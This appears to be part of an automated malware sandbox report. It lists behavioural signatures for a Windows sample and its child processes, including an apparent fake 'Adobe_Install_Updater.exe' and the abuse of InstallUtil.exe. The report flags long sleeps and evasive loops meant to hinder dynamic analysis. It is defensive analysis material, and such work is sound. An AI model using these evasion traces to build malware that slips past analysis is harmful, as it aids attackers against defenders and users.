Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 27F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 47F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2BE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2DE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4DE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: D50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2B80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1310000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2CD0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2EA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4EA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 2530000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 2770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 2570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 22A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 24B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory allocated: 22C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: FE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3200000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 34B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3200000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Window / User API: threadDelayed 2687 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Window / User API: threadDelayed 4963 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 2836 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 4088 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2384 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7236 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Window / User API: threadDelayed 2164
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Window / User API: threadDelayed 2995
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3469
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Window / User API: threadDelayed 3156
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Window / User API: threadDelayed 3554
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Window / User API: threadDelayed 4205
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Window / User API: threadDelayed 3996
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 2702
Source: C:\Users\user\AppData\Local\Temp\build.exe Window / User API: threadDelayed 6408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4608
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Window / User API: threadDelayed 3218
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Window / User API: threadDelayed 5004
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Window / User API: threadDelayed 3311
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Window / User API: threadDelayed 6511
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 6556 Thread sleep count: 2687 > 30 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1848 Thread sleep count: 4963 > 30 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99497s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99271s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -99047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98240s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97897s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97795s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97461s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97119s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -97016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -96092s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe TID: 1436 Thread sleep time: -95984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 4072 Thread sleep time: -23980767295822402s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 1600 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 5376 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99869s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3920 Thread sleep count: 2384 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3920 Thread sleep count: 7236 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99764s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99328s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99218s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99107s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -99000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98777s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98343s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98124s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -98009s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97343s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97125s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -97015s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96906s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96796s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96687s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96578s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96440s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96298s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -96062s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95953s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95843s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95734s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95625s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95515s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95406s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95296s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95187s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -95078s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -94968s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1292 Thread sleep time: -94859s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1576 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 6948 Thread sleep count: 2164 > 30
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 6948 Thread sleep count: 2995 > 30
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99671s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99545s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99327s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99217s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99107s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98671s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98452s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98336s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -98150s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97605s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97499s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97389s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97171s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -97062s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -96953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -96842s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -96734s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 5880 Thread sleep time: -96625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2292 Thread sleep count: 2886 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99871s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99745s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2292 Thread sleep count: 3469 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -99094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -98015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97577s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97442s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97182s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -97078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6760 Thread sleep time: -96406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 4744 Thread sleep count: 3156 > 30
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99828s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 4744 Thread sleep count: 3554 > 30
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99718s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99390s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99168s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -99061s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98927s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98666s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98453s >= -30000s
